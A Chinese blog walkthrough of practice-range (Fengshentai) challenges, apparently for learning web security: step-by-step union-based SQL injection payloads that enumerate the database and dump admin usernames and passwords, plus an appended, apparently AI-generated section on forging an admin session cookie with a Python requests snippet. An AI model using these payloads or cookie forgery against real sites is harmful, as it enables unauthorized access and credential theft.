封神台靶场 第一章:为了女神小芳 (SQL注入)

本文通过实例演示了如何利用SQL注入漏洞,逐步从发现注入点到获取敏感信息的过程,并介绍了联合查询的具体应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

@封神台 网址 https://hack.zkaq.cn

题目

一、寻找注入点

?id=1 and 1=1  #回显正常

?id=1 and 1=2  #回显异常

 二、查看字段数

?id=1 order by 1,2  #回显正常

?id=1 order by 3 #回显异常

三、判断回显点

       得到回显位置为2 下一步利用联合查询寻找回显点,构造 

?id=1 and 1=2 union select 1,2

四、寻找相关内容

   1.查看版本信息

?id=1 and 1=2 union select 1,version()

2.爆数据库名

?id=1 and 1=2 union select 1,database()

3.爆表名

?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

4.爆字段名

猜测所要的信息在admin表中(admin一般代表用户)

?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

5.获取字段值

?id=1 and 1=2 union select 1,group_concat(username,password) from admin

 

或者用 用户admin,接着查询password密码

?id=1 and 1=2 union select 1,password from admin

最后成功拿取flag hellohack 

总结

本题考查SQL注入的联合查询(union注入)的用法

了解更多SQL注入 点击这里 SQL详解

### 封神台靶场第三关解决方案 封神台靶场是一个专门为新手设计的学习平台,其中包含了大量常见的 Web 安全漏洞[^3]。对于第三关的挑战,通常涉及 Cookie 的篡改以及权限提升的技术。 #### 背景分析 在这一关中,目标通常是通过修改浏览器中的 Cookie 来获取管理员权限并访问受保护的内容。Cookie 是一种客户端存储机制,在许多情况下用于保存用户的会话状态或身份验证信息。攻击者可以通过伪造这些数据来模拟合法用户的身份[^2]。 #### 技术实现方法 以下是解决此问题的具体技术手段: 1. **识别关键字段** 首先观察登录后的请求头部分,找到名为 `ADMINSESSIONIDCSTRCSDQ` 的 Cookie 值。这是一个典型的会话 ID 字符串,可能用来区分不同用户的角色和权限。 2. **替换现有值** 使用开发者工具(如 Chrome DevTools),转到“Application”标签页下的 Storage -> Cookies 中定位站点对应的记录项。将原有的随机字符串更改为已知有效的管理级令牌: ```plaintext LBMLMBCCNPFINOANFGLPCFBC ``` 3. **重新加载页面** 修改完成后刷新当前网页即可触发新的认证流程。如果一切正常,则应该能够跳转至后台管理系统界面。 4. **后续操作** 成功突破后可以进一步探索系统内部结构,了解潜在的安全隐患所在之处。不过需要注意的是,在真实环境中未经授权擅自尝试此类行为属于违法行为,请仅限于授权范围内的练习环境内实践上述技巧[^1]。 ```python import requests from http.cookiejar import MozillaCookieJar # 设置自定义 cookies cookies = {'ADMINSESSIONIDCSTRCSDQ': 'LBMLMBCCNPFINOANFGLPCFBC'} response = requests.get('http://example.com/admin', cookies=cookies) print(response.text) ``` 以上代码片段展示了如何利用 Python 请求库发送带有特定 cookies 参数的 HTTP GET 请求,从而模仿具有特殊权限的访客身份访问受限资源。 #### 总结 通过对 Cookie 数据的手动编辑实现了越权访问的功能演示。这一步骤揭示了不当处理用户输入可能导致严重的安全隐患——即使是在看似无害的小型项目里也需格外小心对待安全性议题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值